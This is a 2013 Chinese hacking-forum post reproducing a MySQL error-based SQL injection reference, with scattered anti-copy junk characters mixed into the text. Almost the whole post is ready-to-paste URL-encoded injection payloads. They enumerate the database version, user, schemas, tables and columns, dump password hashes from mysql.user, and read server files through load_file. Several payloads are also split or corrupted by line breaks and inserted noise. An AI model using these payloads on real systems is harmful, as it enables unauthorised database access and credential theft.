Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑


  Y) q. k! |. v  R9 y" ~) |. @Mysql暴错注入参考（pdf），每天一贴。。。

- x+ O2 V& w9 D5 ?, o9 gMySql Error Based Injection Reference
[Mysql暴错注入参考]
( Y* P8 Q9 x$ u2 FAuthornig0s1992
$ G9 V) K; z5 m4 {' z# DBlog:http://pnig0s1992.blog.51cto.com/
* e% |  E/ Z0 c' eTeAm:http://www.FreeBuf.com/
Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
小部分版本使用name_const()时会报错.可以用给出的Method.2测试
( D/ _% D$ {3 I, {& k1 o查询版本:
" X3 {0 N% z% M: Q& ]Method.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
join+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
# |4 l/ ~# ~8 Q/ K0 j" T6 S查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
and(0)*2))x+from+information_schema.tables+group+by+x)a)
查询当前数据库:
& ~# ^+ U0 s# f2 P4 K9 yMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
) \. J  B# S& `! f3 }or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
* d4 @( j2 g; A! g) j5 E: U- ^顺序替换
爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
9 b3 b" Q2 o! b" N3 v+ W+by+x)a)+and+1=1 0x6D7973716C=mysql
5 b) ~  z, I& t# m! p2 k# \- v( Y0 u0 g依次爆表:
( R5 l* x9 [0 U% }& ]/ Iand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
: a* S: X# S  i. C" b: q4 ]0x6D7973716C=Mysql 将n顺序替换
爆表内字段数目:
! w; Z1 w' ?; n1 ^and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
" t6 l3 R; p! M5 }+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
; O/ q4 ~# Y; p8 K: b# I依次爆字段:
9 r  O6 z  U* L. @% C5 `7 [- Fand+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
1 M! v- i) C( n; J) P5 c3 z0 \+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
! g; C" a! y& O  V1 r! ]9 f, K2 R依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
ma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
# |4 f! [' Z  L- _- t将n顺序替换
爆文件内容:
" @7 N* ]- z% v9 M9 gand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
from+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.
  V% Y& U# P1 u  ?& s1 H9 M! V, M6 `+ q
不要下载也可以，
9 X- t3 S8 ^( A